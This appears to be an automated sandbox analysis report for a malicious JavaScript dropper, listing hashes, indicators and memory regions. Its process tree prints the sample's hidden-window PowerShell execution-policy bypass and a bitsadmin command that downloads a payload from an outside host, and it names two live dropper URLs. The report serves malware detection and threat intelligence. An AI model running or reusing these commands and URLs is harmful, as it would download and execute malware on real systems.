Analysis

  • max time kernel
    42s
  • max time network
    57s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230703-en, locale:en-us, os:windows7-x64, system
  • submitted
    08-07-2023 08:29

General

  • Target

    servs6572.js

  • Size

    46KB

  • MD5

    d0bae3a9204c735791f07d7c0d6d2951

  • SHA1

    e78a56d38f7ed6fa8516f6924f8378e9716bac5c

  • SHA256

    f578371283ea332b5118e584b1c6f0910dad7140554f8a05148f6709c6cad1da

  • SHA512

    ffd13cf98bdc9a00d73a4d13723e11a08926d6204023b941f8f318d870f42d4d54030800629fd746e04a415135d2eea6c99f01408307e9dba353189b3d18c51a

  • SSDEEP

    768:MHisCv89uYMvvd2q8g8oI/+I/aJ09blD31TZPu2Bfjn55BYEPrOBoZKnDM:MCs1lYI/+LJ09bh3NZ221b55BVOBCKDM

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ecotree.co.in/images/cora.zip

exe.dropper

https://ecotree.co.in/images/files/cora.zip

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\servs6572.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\iy2e8pn.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://ecotree.co.in/images/files/cora.zipAudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2900

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\iy2e8pn.ps1

    Filesize

    1KB

    MD5

    b00d5e3188907d5a12fdeaea064c1567

    SHA1

    aa76f76b9b4c7af36599410324c1be497b4e5156

    SHA256

    738ad290741e5cb5480fc1a4043099c2fdbafe0d8f1609d35810629155a4a404

    SHA512

    36de1b65b5675a3df2d69884c296059976aa5c6922e2111b11a4c5465cf0c6c3c3ae710d51907bb17b02a9c792f75320e7596a1af352151bd3dbfa90663dbb14

  • memory/2308-60-0x000000001B240000-0x000000001B522000-memory.dmp

    Filesize

    2.9MB

  • memory/2308-61-0x00000000023F0000-0x00000000023F8000-memory.dmp

    Filesize

    32KB

  • memory/2308-62-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

  • memory/2308-63-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

  • memory/2308-65-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

  • memory/2308-66-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

  • memory/2308-67-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

  • memory/2308-68-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

  • memory/2308-69-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB